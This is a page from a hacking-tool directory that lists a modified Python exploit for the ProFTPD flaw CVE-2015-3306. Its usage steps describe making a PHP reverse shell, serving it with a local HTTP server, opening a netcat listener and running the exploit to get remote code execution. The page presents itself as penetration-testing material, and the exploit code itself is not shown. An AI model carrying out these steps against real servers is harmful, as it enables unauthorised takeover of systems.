Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Modified-CVE-2015-3306-Exploit — Python exploit for CVE-2015-3306 targeting ProFTPD servers. Automates PHP reverse shell upload via FTP to achieve remote code execution on vulnerable hosts. | Kitploit
Tools/GitHubGitHub/cdedmondson/modified-cve-2015-3306-exploit
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubcdedmondson/modified-cve-2015-3306-exploit

Modified-CVE-2015-3306-Exploit

Python exploit for CVE-2015-3306 targeting ProFTPD servers. Automates PHP reverse shell upload via FTP to achieve remote code execution on vulnerable hosts.

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
View Repository
16 years agoNot yet reviewed
Share

Modified-CVE-2015-3306-Exploit

How to

  1. Create a php reverse shell
  2. Start server to host shell in the same directory (python3 -m http.server)
  3. Start netcat listener on local port of choice example: (nc -nlvp [port of choice])
  4. Run exploit example provided below (python3 modified_CVE_2015_3306.py --host [remote host] --port [most likely port 21] --path [/var/www or /var/www/html] --shell [name of php shell] --lhost [port of netcat listener] --server_port [port of server hosting shell]

Original exploit source code: https://github.com/t0kx/exploit-CVE-2015-3306/blob/master/exploit.py

Download Tool